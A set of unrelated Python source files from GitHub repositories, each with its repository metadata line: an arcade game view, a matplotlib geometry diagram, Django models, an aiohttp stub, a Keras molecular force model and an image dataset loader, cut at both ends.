        self.tabs[0].center_y = c.round_to_x(self.window.view_y + c.SCREEN_HEIGHT // 2, 5 * c.SPRITE_SCALE)
        self.pressed = None
        self.ui_tabs_over = []
        # keys for held checks
        self.shift = False
        # Debugging tools
        self.test_list = arcade.SpriteList()
        # player action data
        self.selected_action = 'move'
        self.pending_action = None
        self.current_handler = None
        # View code: state for the eased camera animation (see on_update)
        self.motion = False
        self.motion_start = 0
        self.motion_length = 1.10
        self.pending_motion: List[Tuple[float, float]] = []
        self.current_motion = None
        self.current_motion_start: Tuple[float, float] = (self.window.view_x, self.window.view_y)
        # Last action: reorder the shown isometric sprites
        c.iso_changed()
    # set view port
    def move_view(self, dx, dy):
        """Scroll the camera by (dx, dy), snapped to sprite pixels."""
        # Round to fit the pixels of sprites
        rx = c.round_to_x(dx, 5 * c.SPRITE_SCALE)
        ry = c.round_to_x(dy, 5 * c.SPRITE_SCALE)
        # move the view by this amount
        self.window.view_x -= rx
        self.window.view_y -= ry
        # Move the ui and set the viewport.
        self.ui_elements.move(-rx, -ry)
        arcade.set_viewport(self.window.view_x, self.window.view_x + c.SCREEN_WIDTH,
                            self.window.view_y, self.window.view_y + c.SCREEN_HEIGHT)
    def set_view(self, x, y):
        """Place the camera at an absolute (x, y), snapped to sprite pixels."""
        # find the change x and y then round to fit the pixels of sprites
        dx = c.round_to_x(x - self.window.view_x, 5 * c.SPRITE_SCALE)
        dy = c.round_to_x(y - self.window.view_y, 5 * c.SPRITE_SCALE)
        # Set the view to the rounded inputs
        self.window.view_x = c.round_to_x(x, 5 * c.SPRITE_SCALE)
        self.window.view_y = c.round_to_x(y, 5 * c.SPRITE_SCALE)
        # Move the ui and set the viewport
        self.ui_elements.move(dx, dy)
        arcade.set_viewport(self.window.view_x, self.window.view_x + c.SCREEN_WIDTH,
                            self.window.view_y, self.window.view_y + c.SCREEN_HEIGHT)
    def on_draw(self):
        self.map_handler.map.vision_handler.draw_prep()
        arcade.start_render()
        c.GROUND_LIST.draw()
        # Middle Shaders Between floor and other isometric sprites
        if self.map_handler is not None:
            self.map_handler.draw()
        c.ISO_LIST.draw()
        self.turn_handler.on_draw()
        if self.pending_action is not None:
            self.pending_action.draw()
        for element in self.ui_elements:
            element.draw()
        self.action_tab.draw()
        # Debugging of the map_handler
        # self.map_handler.debug_draw(True)
        self.map_handler.debug_draw()
        self.window.mouse.draw()
    def on_key_press(self, symbol: int, modifiers: int):
        # keyboard input is forwarded to the conversation/talk tab
        self.tabs[0].on_key_press(symbol, modifiers)
    def on_update(self, delta_time: float):
        # Debug FPS
        # print(f"FPS: {1/delta_time}")
        self.turn_handler.on_update(delta_time)
        # detect a change of whose turn it is
        if self.current_handler != self.turn_handler.current_handler:
            self.current_handler = self.turn_handler.current_handler
            if self.current_handler is self.player.action_handler:
                if self.selected_tile is not None:
                    self.selected_tile.new_pos(self.player.e_x, self.player.e_y)
                self.action_tab.find_actions(self.player.e_x, self.player.e_y)
        if self.turn_handler.current_handler != self.player.action_handler:
            self.turn_handler.current_handler.actor.update()
        if self.motion:
            # eased camera animation: cubic ease-in/ease-out over motion_length
            t = (time.time() - self.motion_start) / self.motion_length
            if t >= 1:
                self.set_view(*self.current_motion)
                self.motion = False
            else:
                motion_diff = self.current_motion[0] - self.current_motion_start[0], \
                              self.current_motion[1] - self.current_motion_start[1]
                adj_t = 2 * t
                if adj_t < 1:
                    move = 0.5 * adj_t ** 3
                else:
                    adj_t -= 2
                    move = 0.5 * (adj_t ** 3 + 2)
                dx = self.current_motion_start[0] + (move * motion_diff[0])
                dy = self.current_motion_start[1] + (move * motion_diff[1])
                self.set_view(dx, dy)
        elif len(self.pending_motion):
            # start the next queued camera move if it is far enough away
            self.current_motion = self.pending_motion.pop(0)
            if abs(self.current_motion[0] - self.window.view_x) > 15 and \
                    abs(self.current_motion[1] - self.window.view_y) > 15:
                self.current_motion_start = (self.window.view_x, self.window.view_y)
                self.motion_start = time.time()
                self.motion = True
        self.player.update_animation(delta_time)
        for sprite in self.map_handler.map.animated_sprites:
            sprite.update_animation(delta_time)
    def on_show(self):
        # center the camera on the player and start the soundtrack
        self.set_view(self.player.center_x - c.SCREEN_WIDTH / 2, self.player.center_y - c.SCREEN_HEIGHT / 2)
        c.start_music()
    def on_mouse_scroll(self, x: int, y: int, scroll_x: int, scroll_y: int):
        # normalise to -1/+1 and forward to the action tab
        direction = scroll_y/abs(scroll_y)
        self.action_tab.on_scroll(direction)
    def on_mouse_motion(self, x: float, y: float, dx: float, dy: float):
        # translate screen coords to the isometric tile under the cursor
        y_mod = ((160 - c.FLOOR_TILE_THICKNESS) * c.SPRITE_SCALE)
        e_x, e_y = isometric.cast_from_iso(self.window.view_x + x, self.window.view_y + y + y_mod)
        self.ui_tabs_over = arcade.check_for_collision_with_list(self.window.mouse, self.ui_elements)
        if 0 <= e_x < self.map_handler.map_width and 0 <= e_y < self.map_handler.map_height \
                and not len(self.ui_tabs_over):
            if e_x != self.select_tile.e_x or e_y != self.select_tile.e_y:
                self.select_tile.new_pos(e_x, e_y)
                c.iso_changed()
            self.action_tab.on_mouse_motion(e_x, e_y)
        elif self.player.e_x != self.select_tile.e_x or self.player.e_y != self.select_tile.e_y:
            # cursor off-map or over UI: park the hover tile on the player
            self.select_tile.new_pos(self.player.e_x, self.player.e_y)
            c.iso_changed()
    def on_mouse_drag(self, x: float, y: float, dx: float, dy: float, _buttons: int, _modifiers: int):
        if _buttons == 2:
            # middle-drag pans the camera and cancels any queued camera moves
            self.move_view(dx, dy)
            if len(self.pending_motion):
                self.pending_motion = []
                self.current_motion = None
                self.motion = False
        elif _buttons == 1:
            # left-drag moves the topmost UI tab under the cursor
            self.ui_tabs_over = arcade.check_for_collision_with_list(self.window.mouse, self.ui_elements)
            if self.pressed is None and len(self.ui_tabs_over):
                self.ui_tabs_over[-1].on_drag(dx, dy, (self.window.view_x + x, self.window.view_y + y))
                self.pressed = self.ui_tabs_over[-1]
            elif self.pressed is not None and self.pressed.pressed_button is None:
                self.pressed.on_drag(dx, dy, (self.window.view_x + x, self.window.view_y + y))
    def on_mouse_release(self, x: float, y: float, button: int,
                         modifiers: int):
        if self.pressed is not None:
            self.pressed.on_release((self.window.view_x + x, self.window.view_y + y))
            self.pressed = None
    def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):
        select = False
        if button == 1:
            # left click: UI tab if over one, otherwise tile selection
            pressed = arcade.check_for_collision_with_list(self.window.mouse, self.ui_elements)
            if len(pressed):
                self.pressed: ui.Tab = pressed[-1]
                self.pressed.on_press((self.window.view_x + x, self.window.view_y + y))
            else:
                select = True
        elif button == 4:
            select = True
        if select:
            self.action_tab.on_mouse_press(button)
            if self.selected_tile is None:
                self.selected_tile = player.Selected(self.select_tile.e_x, self.select_tile.e_y)
                c.ISO_LIST.append(self.selected_tile)
            else:
                self.selected_tile.new_pos(self.select_tile.e_x, self.select_tile.e_y)
    def new_bot(self, bot):
        """Spawn a bot at the given template's position and register it."""
        new_bot = create_bot(bot.x, bot.y, self.map_handler.full_map)
        self.current_ai.append(new_bot)
        if len(new_bot.animations):
            self.map_handler.map.animated_sprites.append(new_bot)
        c.iso_append(new_bot)
        self.turn_handler.new_action_handlers([new_bot.action_handler])
    def reset_bots(self):
        """Unregister and remove all currently-active bots."""
        self.turn_handler.remove_action_handlers(map(lambda bot: bot.action_handler, self.current_ai))
        c.iso_strip(self.current_ai)
        self.current_ai = []
    def set_bots(self, bots):
        # NOTE(review): this registers action handlers for the OLD
        # self.current_ai list *before* replacing it with `bots` — it looks
        # like the map should be over `bots` (mirroring reset_bots); confirm.
        self.turn_handler.new_action_handlers(map(lambda bot: bot.action_handler, self.current_ai))
        self.current_ai = bots
class TitleView(arcade.View):
    """
    The TitleView is the title: it fades in an instruction slide first,
    then shows the title image until the player advances.
    """
    def __init__(self):
        super().__init__()
        self.image = arcade.Sprite("assets/Title.png", c.SPRITE_SCALE,
                                   center_x=c.SCREEN_WIDTH/2, center_y=c.SCREEN_HEIGHT/2)
        # 0 = instruction slide, 1 = title image, >=2 = hand over to the game
        self.state = 0
        self.timer = 0
        self.text = None
    def on_draw(self):
        arcade.start_render()
        color = [255, 255, 255, 255]
        alpha = 255
        elapsed = time.time() - self.timer
        def start_draw():
            # fade the instruction text in over ~2.3 seconds
            nonlocal alpha
            t = elapsed/2.3 if elapsed else 0
            if t <= 1:
                alpha = 255*t
            if self.text is None:
                text = ("This Game is an Investigative Narrative.\n"
                        "\n"
                        "It is recommended that you have a set 10 to 15 minutes to play.\n"
                        "There is no saving. A pen and note pad is suggested.\n"
                        "\n"
                        "The Aim is to understand the story and to survive.\n"
                        "Pay attention, and watch your back.\n"
                        "\n"
                        "Press Any Key to Continue.")
                self.text = arcade.draw_text(text, c.SCREEN_WIDTH // 2, c.SCREEN_HEIGHT // 2, tuple(color),
                                             anchor_x="center", anchor_y="center", align="center", font_size=24)
            else:
                self.text.alpha = alpha
                self.text.draw()
        def wait_draw():
            self.image.draw()
            arcade.draw_text("Press anything to start",
                             c.SCREEN_WIDTH // 2,
                             c.SCREEN_HEIGHT // 2 - 25, tuple(color))
        states = [start_draw, wait_draw]
        if self.state < len(states):
            states[self.state]()
        else:
            # past the last slide: start the game proper
            self.window.show_view(self.window.game)
    def on_show(self):
        self.state = 0
        self.timer = time.time()
    def on_key_press(self, symbol: int, modifiers: int):
        # NOTE(review): despite the on-screen "Press Any Key" text, only
        # ENTER advances here — confirm whether that is intended.
        if symbol == arcade.key.ENTER:
            self.state += 1
            self.timer = time.time()
def main():
    """Create the game window and enter the arcade event loop (blocks until quit)."""
    window = TemporumWindow()
    arcade.run()
| DragonMoffon/Temporum | views.py | views.py | py | 19,235 | python | en | code | 2 | github-code | 13 |
#T# the following code shows how to draw a circle to show examples of segments and lines of circles
#T# to draw a circle to show examples of segments and lines of circles, the pyplot module of the matplotlib package is used
import matplotlib.pyplot as plt
#T# the patches module of the matplotlib package is used to draw shapes
import matplotlib.patches as mpatches
#T# import the math module to do calculations
import math
#T# create the figure and axes
fig1, ax1 = plt.subplots(1, 1)
#T# set the aspect of the axes
ax1.set_aspect('equal', adjustable = 'datalim')
#T# hide the spines and ticks
for it1 in ['top', 'bottom', 'left', 'right']:
    ax1.spines[it1].set_visible(False)
ax1.xaxis.set_visible(False)
ax1.yaxis.set_visible(False)
#T# create the variables that define the plot
#T# A is the circle's center and r its radius; each a_* variable is an angle in radians locating a point on the circle
A = (0, 0)
r = 1
a_B = math.pi/5
B = (r*math.cos(a_B), r*math.sin(a_B)) #| radius
a_C = math.pi*4.8/5
a_D = a_C + math.pi
C = (r*math.cos(a_C), r*math.sin(a_C)) #| diameter
D = (r*math.cos(a_D), r*math.sin(a_D))
a_E = math.pi*4/5
a_F = math.pi*2/5
E = (r*math.cos(a_E), r*math.sin(a_E)) #| chord
F = (r*math.cos(a_F), r*math.sin(a_F))
a_G = 3.72
a_H = 5.935
G = (r*math.cos(a_G), r*math.sin(a_G)) #| secant
H = (r*math.cos(a_H), r*math.sin(a_H))
#T# G1 and H1 extend the secant beyond the circle so the arrowed line visibly crosses it
G1 = (-1.3, -.6)
H1 = (1.3, -.3)
a_I = math.pi*3.2/2
I = (r*math.cos(a_I), r*math.sin(a_I)) #| tangent
#T# the tangent at I is perpendicular to the radius AI, so its slope is the negative reciprocal of AI's slope
m_AI = (I[1] - A[1])/(I[0] - A[0])
m_perp_AI = -1/m_AI
b_perp_AI = I[1] - m_perp_AI*I[0]
x_I1 = -.6
y_I1 = m_perp_AI*x_I1 + b_perp_AI
x_I2 = 1.15
y_I2 = m_perp_AI*x_I2 + b_perp_AI
I1 = (x_I1, y_I1)
I2 = (x_I2, y_I2)
list_x_1 = [A[0], B[0]]
list_y_1 = [A[1], B[1]]
list_x_2 = [C[0], D[0]]
list_y_2 = [C[1], D[1]]
list_x_3 = [E[0], F[0]]
list_y_3 = [E[1], F[1]]
list_x_4 = [G[0], H[0]]
list_y_4 = [G[1], H[1]]
#T# plot the figure
circle1 = mpatches.Arc(A, 2*r, 2*r, linewidth = 1.5)
ax1.add_patch(circle1)
ax1.plot(list_x_1, list_y_1, 'o-k', markersize = 3)
ax1.plot(list_x_2, list_y_2, 'o-k', markersize = 3)
ax1.plot(list_x_3, list_y_3, 'o-k', markersize = 3)
ax1.plot(list_x_4, list_y_4, 'o-k', markersize = 3)
line1 = mpatches.FancyArrowPatch(G1, H1, arrowstyle = '<->', mutation_scale = 12, linewidth = 1.5)
ax1.add_patch(line1)
ax1.plot(I[0], I[1], 'o-k', markersize = 3)
line2 = mpatches.FancyArrowPatch(I1, I2, arrowstyle = '<->', mutation_scale = 12, linewidth = 1.5)
ax1.add_patch(line2)
#T# set the math text font to the Latex default, Computer Modern
import matplotlib
matplotlib.rcParams['mathtext.fontset'] = 'cm'
#T# create the labels
label_A = ax1.annotate(r'$A$', A, size = 16)
label_radius = ax1.annotate(r'$radius$', (-1, 1), size = 16)
label_diameter = ax1.annotate(r'$diameter$', (0, 1), size = 16)
label_chord = ax1.annotate(r'$chord$', (1, 1), size = 16)
label_secant = ax1.annotate(r'$secant$', (-1, -1), size = 16)
label_tangent = ax1.annotate(r'$tangent$', (0, -1), size = 16)
#T# drag the labels if needed
label_A.draggable()
label_radius.draggable()
label_diameter.draggable()
label_chord.draggable()
label_secant.draggable()
label_tangent.draggable()
#T# show the results
ax1.autoscale()
plt.show()
15863858271 | import os
from django.core.files.storage import default_storage
from apps.common.models import BaseModel, Institucion, UbigeoPais
from django.db import models
from apps.persona.models import Persona
class Distincion(BaseModel):
    """An award/distinction earned by a person, with its supporting documents."""
    institucion = models.ForeignKey(Institucion, on_delete=models.PROTECT)
    distincion = models.CharField('Distinción', max_length=250)
    descripcion = models.TextField('Descripción', max_length=600)
    pais = models.ForeignKey(UbigeoPais, on_delete=models.PROTECT)
    web_referencia = models.CharField('Web referencia', max_length=250)
    fecha = models.DateField()
    persona = models.ForeignKey(Persona, on_delete=models.PROTECT)
    def delete(self, using=None, keep_parents=False):
        """Delete the row after removing every attached file from storage.

        Fix: guard with os.path.isfile -- the old truthiness check on the path
        string did not protect os.remove from a missing/already-removed file,
        so a stale attachment record aborted the whole delete with
        FileNotFoundError.
        """
        for au in self.adjuntodistincion_set.all():
            path = default_storage.path(au.ruta)
            if path and os.path.isfile(path):
                os.remove(path)
        super(Distincion, self).delete()
class AdjuntoDistincion(BaseModel):
    """A single file attached to a Distincion (name + storage path)."""
    nombre = models.CharField('Nombre del documento', max_length=200)
    ruta = models.TextField('Ruta del documento', max_length=500)
    distincion = models.ForeignKey(Distincion, on_delete=models.CASCADE)
    def delete(self, using=None, keep_parents=False):
        """Delete the row after removing its file from storage.

        Fix: check os.path.isfile so a missing file does not abort the delete
        with FileNotFoundError (the old check only tested path truthiness).
        """
        path = default_storage.path(self.ruta)
        if path and os.path.isfile(path):
            os.remove(path)
        super(AdjuntoDistincion, self).delete()
| cpaucarc/legajos | apps/distincion/models.py | models.py | py | 1,369 | python | en | code | 2 | github-code | 13 |
27397459234 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
"""
from aiohttp import web
import asyncio
from text_transformation.transformer import Transformer
class Server:
    """Minimal aiohttp application exposing the text-transformation endpoint."""
    def __init__(self):
        app = web.Application()
        # adding current routes
        routes = [
            web.post("/transform_text", self.transform_text)
        ]
        app.add_routes(routes)
        self.app = app
    def run(self):
        # NOTE(review): this Transformer is created but never stored or used --
        # presumably meant to warm something up or be kept on self; confirm intent.
        t = Transformer()
        # Blocks and serves until the process is stopped.
        web.run_app(self.app)
    async def transform_text(self, request):
        # Placeholder handler: logs the raw request and returns a fixed body.
        print(request)
        return web.Response(text="Hello, world")
| TLReber/LSPT-TextTransformation | sandbox/_server.py | _server.py | py | 594 | python | en | code | 1 | github-code | 13 |
10977881958 | import ipaddress
from pathlib import Path
from typing import List, Optional, Any
import yaml
from model.manufacturer import Manufacturer
from repository.exceptions import (
ManufacturerAlreadyExistsException,
ManufacturerNotFoundException,
)
from .manufacturers import ManufacturersRepository
def ipv4_representer(dumper, data):
    """Serialize an ipaddress.IPv4Address as a tagged YAML scalar."""
    return dumper.represent_scalar("!ipaddress.IPv4Address", str(data))
def ipv4_constructor(loader, node):
    """Rebuild an ipaddress.IPv4Address from its tagged YAML scalar."""
    value = loader.construct_scalar(node)
    return ipaddress.IPv4Address(value)
# Register the custom tag globally so yaml.dump / yaml.full_load round-trip IPv4 addresses.
yaml.add_representer(ipaddress.IPv4Address, ipv4_representer)
yaml.add_constructor("!ipaddress.IPv4Address", ipv4_constructor)
class ManufacturersRepositoryYAMLFile(ManufacturersRepository):
    """Manufacturer repository persisted in a single ``manufacturers.yml`` file."""
    def __init__(self, file_source: Optional[str]) -> None:
        super().__init__(file_source)
        self._file_name = self._get_dir(self._file_source)
        # Seed the in-memory cache from disk when the file already exists.
        self._manufacturers = (
            self._get_manufacturers_from_yaml_file()
            if Path(self._file_name).is_file()
            else []
        )
    def _get_dir(self, file_name: str) -> Path:
        """Resolve the path of the backing YAML file.

        NOTE(review): the *file_name* argument is ignored and the path is
        always built from ``self._file_source`` -- confirm that is intended.
        """
        return (
            Path(__file__).parent.parent.parent / self._file_source / "manufacturers.yml"
        )
    def _get_manufacturers_from_yaml_file(self) -> List[Manufacturer]:
        """Load the YAML file, mapping each ``{name: attrs}`` entry to a model."""
        with open(self._file_name) as file:
            manufacturers_raw = yaml.full_load(file)
        manufacturer_list = []
        for entry in manufacturers_raw:
            name, attrs = next(iter(entry.items()))
            attrs.update({"name": name})
            manufacturer_list.append(Manufacturer(**attrs))
        return manufacturer_list
    def _save_manufacturers_to_yaml_file(self) -> None:
        """Write the in-memory list back to disk in the ``{name: attrs}`` layout."""
        manufacturers = []
        for manufacturer in (m.dict() for m in self._manufacturers):
            manufacturers.append({manufacturer.pop("name"): manufacturer})
        with open(self._file_name, mode="w") as f:
            f.write(yaml.dump(manufacturers, indent=10, default_flow_style=False))
    def get_manufacturer(self, id: int) -> Manufacturer:
        """Return the manufacturer with *id*, refreshing from disk first.

        Raises ManufacturerNotFoundException when no such id exists.
        Fixes: the old code called the loader but discarded its result (no
        refresh actually happened), and it crashed with FileNotFoundError
        when the YAML file did not exist yet (breaking the first create).
        """
        if Path(self._file_name).is_file():
            self._manufacturers = self._get_manufacturers_from_yaml_file()
        for manufacturer in self._manufacturers:
            if manufacturer.id == id:
                return manufacturer
        raise ManufacturerNotFoundException(id)
    def create_manufacturer(self, manufacturer: Manufacturer) -> Any:
        """Add a new manufacturer; raise when its id is already taken."""
        try:
            self.get_manufacturer(manufacturer.id)
        except ManufacturerNotFoundException:
            self._manufacturers.append(manufacturer)
            self._save_manufacturers_to_yaml_file()
            return manufacturer
        else:
            raise ManufacturerAlreadyExistsException(manufacturer.id)
    def update_manufacturer(self, id: int, manufacturer: Manufacturer) -> None:
        """Replace the manufacturer stored under *id* with *manufacturer*.

        Raises ManufacturerNotFoundException when *id* does not exist.
        Fix: the previous implementation duplicated create_manufacturer's
        existence guard (raising AlreadyExists when the target WAS found) and
        never stored the updated record at all.
        """
        existing = self.get_manufacturer(id)
        self._manufacturers.remove(existing)
        self._manufacturers.append(manufacturer)
        self._save_manufacturers_to_yaml_file()
| pedrolp85/pydevice | app/repository/manufacturers/manufacturersYAMLfile.py | manufacturersYAMLfile.py | py | 3,184 | python | en | code | 0 | github-code | 13 |
47005982804 | import numpy as np
def cross_v(a1='aroonlow', val11=100, df=None):
    """Add a thresholded copy of column *a1* to *df* and return the new column.

    The new column is named ``f"{a1}{val11}_v"``. For a positive threshold it
    keeps values >= val11 (others become 0); for a threshold <= 0 it keeps
    values <= val11. *df* is modified in place.
    """
    ar = a1 + str(val11) + '_v'
    # The old code pre-filled the column with None and then unconditionally
    # overwrote it in both branches; that dead write is dropped.
    if val11 > 0:
        df[ar] = np.where(df[a1] >= val11, df[a1], 0)
    else:
        df[ar] = np.where(df[a1] <= val11, df[a1], 0)
    return df[ar]
37086085946 | from .internal import GradientLayer, MomentumNormalization, \
NeighborhoodReduction, \
PairwiseValueNormalization, PairwiseVectorDifference, \
PairwiseVectorDifferenceSum, VectorAttention
import flowws
from flowws import Argument as Arg
import numpy as np
import tensorflow as tf
from tensorflow import keras
# Activation functions that have no keras string alias and must go through a Lambda layer.
LAMBDA_ACTIVATIONS = {
    'log1pswish': lambda x: tf.math.log1p(tf.nn.swish(x)),
    'sin': tf.sin,
}
# Factories for normalization layers, keyed by the user-facing name.
# Each factory receives the correlation rank; only 'layer_all' uses it.
NORMALIZATION_LAYERS = {
    'layer': lambda _: keras.layers.LayerNormalization(),
    'layer_all': lambda rank: keras.layers.LayerNormalization(axis=[-i - 1 for i in range(rank + 1)]),
    'momentum': lambda _: MomentumNormalization(),
    'pairwise': lambda _: PairwiseValueNormalization(),
}
# Appended to several Arg help strings to list the valid normalization names.
NORMALIZATION_LAYER_DOC = ' (any of {})'.format(','.join(NORMALIZATION_LAYERS))
@flowws.add_stage_arguments
class MoleculeForceRegression(flowws.Stage):
    """Build a geometric attention network for the molecular force regression task.
    This module specifies the architecture of a network to calculate
    atomic forces given the coordinates and types of atoms in a
    molecule. Conservative forces are computed by calculating the
    gradient of a scalar.
    """
    ARGS = [
        Arg('rank', None, int, 2,
            help='Degree of correlations (n-vectors) to consider'),
        Arg('n_dim', '-n', int, 32,
            help='Working dimensionality of point representations'),
        Arg('dilation', None, float, 2,
            help='Working dimension dilation factor for MLP components'),
        Arg('merge_fun', '-m', str, 'concat',
            help='Method to merge point representations'),
        Arg('join_fun', '-j', str, 'concat',
            help='Method to join invariant and point representations'),
        Arg('dropout', '-d', float, 0,
            help='Dropout rate to use, if any'),
        Arg('mlp_layers', None, int, 1,
            help='Number of hidden layers for score/value MLPs'),
        Arg('n_blocks', '-b', int, 2,
            help='Number of deep blocks to use'),
        Arg('block_nonlinearity', None, bool, True,
            help='If True, add a nonlinearity to the end of each block'),
        Arg('residual', '-r', bool, True,
            help='If True, use residual connections within blocks'),
        Arg('activation', '-a', str, 'swish',
            help='Activation function to use inside the network'),
        Arg('final_activation', None, str, 'swish',
            help='Final activation function to use within the network'),
        Arg('score_normalization', None, [str], [],
            help=('Normalizations to apply to score (attention) function' +
                  NORMALIZATION_LAYER_DOC)),
        Arg('value_normalization', None, [str], [],
            help=('Normalizations to apply to value function' +
                  NORMALIZATION_LAYER_DOC)),
        Arg('invar_normalization', None, [str], [],
            help=('Normalizations to apply to invariants in value function' +
                  NORMALIZATION_LAYER_DOC)),
        Arg('normalize_distances', None, str,
            help='Method to use to normalize pairwise distances'),
        Arg('predict_energy', None, bool, False,
            help='If True, predict energies instead of forces'),
        Arg('energy_bias', None, bool, False,
            help='If True, learn a bias term for energy prediction'),
    ]
    def run(self, scope, storage):
        """Assemble the keras model graph and publish it into *scope*."""
        rank = self.arguments['rank']
        # Activations without a keras string alias are wrapped in a Lambda layer.
        if self.arguments['activation'] in LAMBDA_ACTIVATIONS:
            activation_layer = lambda: keras.layers.Lambda(
                LAMBDA_ACTIVATIONS[self.arguments['activation']])
        else:
            activation_layer = lambda: keras.layers.Activation(
                self.arguments['activation'])
        if self.arguments['final_activation'] in LAMBDA_ACTIVATIONS:
            final_activation_layer = lambda: keras.layers.Lambda(
                LAMBDA_ACTIVATIONS[self.arguments['final_activation']])
        else:
            final_activation_layer = lambda: keras.layers.Activation(
                self.arguments['final_activation'])
        n_dim = self.arguments['n_dim']
        # Hidden width of the MLPs relative to the working dimension.
        dilation_dim = int(np.round(n_dim*self.arguments['dilation']))
        def make_scorefun():
            # MLP producing a scalar attention score per pair.
            layers = []
            for _ in range(self.arguments['mlp_layers']):
                layers.append(keras.layers.Dense(dilation_dim))
                for name in self.arguments['score_normalization']:
                    layers.append(NORMALIZATION_LAYERS[name](rank))
                layers.append(activation_layer())
                if self.arguments.get('dropout', 0):
                    layers.append(keras.layers.Dropout(self.arguments['dropout']))
            layers.append(keras.layers.Dense(1))
            return keras.models.Sequential(layers)
        def make_valuefun(uses_invars=False):
            # MLP producing an n_dim value vector; optionally normalizes the
            # geometric invariants it receives as input first.
            layers = []
            if uses_invars:
                for name in self.arguments['invar_normalization']:
                    layers.append(NORMALIZATION_LAYERS[name](rank))
            for _ in range(self.arguments['mlp_layers']):
                layers.append(keras.layers.Dense(dilation_dim))
                for name in self.arguments['value_normalization']:
                    layers.append(NORMALIZATION_LAYERS[name](rank))
                layers.append(activation_layer())
                if self.arguments.get('dropout', 0):
                    layers.append(keras.layers.Dropout(self.arguments['dropout']))
            layers.append(keras.layers.Dense(n_dim))
            return keras.models.Sequential(layers)
        def make_block(last):
            # One attention block with optional trailing nonlinearity and residual.
            residual_in = last
            last = VectorAttention(
                make_scorefun(), make_valuefun(True), False, rank=rank,
                join_fun=self.arguments['join_fun'],
                merge_fun=self.arguments['merge_fun'])([delta_x, last])
            if self.arguments['block_nonlinearity']:
                last = make_valuefun()(last)
            if self.arguments['residual']:
                last = last + residual_in
            return last
        # Inputs: per-neighborhood atom coordinates and one-hot atom types.
        x_in = keras.layers.Input((scope['neighborhood_size'], 3))
        v_in = keras.layers.Input((scope['neighborhood_size'], scope['num_types']))
        delta_x = PairwiseVectorDifference()(x_in)
        delta_v = PairwiseVectorDifferenceSum()(v_in)
        if 'normalize_distances' in self.arguments:
            mode = self.arguments['normalize_distances']
            if mode == 'momentum':
                delta_x = MomentumNormalization()(delta_x)
            else:
                raise NotImplementedError(mode)
        last = keras.layers.Dense(n_dim)(delta_v)
        for _ in range(self.arguments['n_blocks']):
            last = make_block(last)
        # Final attention also exposes its invariants and attention weights
        # for the auxiliary models published below.
        (last, ivs, att) = VectorAttention(
            make_scorefun(), make_valuefun(True), True, name='final_attention',
            rank=rank,
            join_fun=self.arguments['join_fun'],
            merge_fun=self.arguments['merge_fun'])(
                [delta_x, last], return_invariants=True, return_attention=True)
        last = keras.layers.Dense(dilation_dim, name='final_mlp')(last)
        last = final_activation_layer()(last)
        last = NeighborhoodReduction()(last)
        use_bias = self.arguments.get('energy_bias', False)
        # Project the reduced representation to a scalar energy.
        last = keras.layers.Dense(1, name='energy_projection', use_bias=use_bias)(last)
        energy_prediction = last
        if not self.arguments['predict_energy']:
            # Forces come from the gradient of the scalar energy w.r.t. the
            # input coordinates (sign convention handled by GradientLayer --
            # see its implementation).
            last = GradientLayer()((last, x_in))
            if scope.get('energy_labels', False):
                last = (last[0], energy_prediction)
                kwargs = scope.setdefault('compile_kwargs', {})
                # Weight the force loss heavily relative to the energy loss.
                kwargs['loss_weights'] = (1 - 1e-3, 1e-3)
        scope['input_symbol'] = [x_in, v_in]
        scope['output'] = last
        scope['loss'] = 'mse'
        # Auxiliary read-only models for inspecting attention and invariants.
        scope['attention_model'] = keras.models.Model([x_in, v_in], att)
        scope['invariant_model'] = keras.models.Model([x_in, v_in], ivs)
| klarh/flowws-keras-geometry | flowws_keras_geometry/models/MoleculeForceRegression.py | MoleculeForceRegression.py | py | 8,004 | python | en | code | 6 | github-code | 13 |
30647468625 | import glob
import os
from typing import Tuple, Union
import subprocess
import pandas as pd
from PIL.Image import Image
from torch import Tensor
from torchvision.datasets import ImageFolder
# Dataset variant identifiers: full-resolution crops, colour-labelled crops,
# and their 25x25-pixel downscaled counterparts.
OA_DATASET_FULL = 'OA_DATASET_FULL'
OA_DATASET_COLOR = 'OA_DATASET_COLOR'
OA_DATASET_FULL_25x25 = 'OA_DATASET_FULL_25x25'
OA_DATASET_COLOR_25x25 = 'OA_DATASET_COLOR_25x25'
class OmniArtEyeDataset(ImageFolder):
    """ImageFolder over the OmniArt eye crops, joined with the OmniArt metadata CSV.

    Archives are unpacked lazily on first use; each sample yields the image,
    its ImageFolder class index, and the matching OmniArt metadata records.
    """
    # Tar archive per dataset variant (extracted on first use).
    dataset_tar = {
        OA_DATASET_FULL: 'omniart_eye_dataset.tar.xz',
        OA_DATASET_COLOR_25x25: 'omniart_eye_dataset_color_25x25.tar.xz'
    }
    # Glob pattern of split archive parts for variants shipped in pieces
    # (parts exist because of file-size limits; see __unpack_datasets).
    dataset_tar_part = {
        OA_DATASET_FULL: 'omniart_eye_dataset.tar.*'
    }
    metadata_tar = 'omniart_metadata.tar.xz'
    def __init__(self, transform=None, dataset_type=OA_DATASET_FULL):
        self.dataset_type = dataset_type
        self.transform = transform
        self.root = os.path.join(os.path.dirname(__file__), 'datasets')
        if self.dataset_type == OA_DATASET_FULL:
            self.dataset_folder = 'full'
        elif self.dataset_type == OA_DATASET_COLOR_25x25:
            self.dataset_folder = 'color_25x25'
        else:
            # NOTE(review): '%s' combined with str.format leaves the
            # placeholder unfilled -- should be '{}'.format or %-formatting.
            raise ValueError('Unable to use dataset type %s, it is not implemented'.format(dataset_type))
        if not self.__data_files_exist():
            self.__unpack_datasets()
        self.__csv = pd.read_csv(os.path.join(self.root, 'omniart_metadata.csv'), low_memory=False)
        super(OmniArtEyeDataset, self).__init__(os.path.join(self.root, self.dataset_folder), transform=self.transform)
    def __data_files_exist(self) -> bool:
        # Both the extracted image folder and the metadata CSV must be present.
        return os.path.isdir(os.path.join(self.root, self.dataset_folder)) and \
            os.path.isfile(os.path.join(self.root, 'omniart_metadata.csv'))
    def __unpack_datasets(self):
        """Join split archive parts if needed, then extract images and metadata."""
        import tarfile
        print("Unpacking OmniArt eyes dataset...")
        # extract the dataset
        if self.dataset_type == OA_DATASET_FULL:
            # First join the part files
            # Part files exist because of file size limits and the lack of an external (permanent) hosting for the files
            part_files = glob.glob(os.path.join(self.root, self.dataset_tar_part[self.dataset_type]))
            with open(os.path.join(self.root, self.dataset_tar[self.dataset_type]), 'wb') as dataset_file:
                for part_file in part_files:
                    with open(part_file, 'rb') as read_file:
                        dataset_file.write(read_file.read())
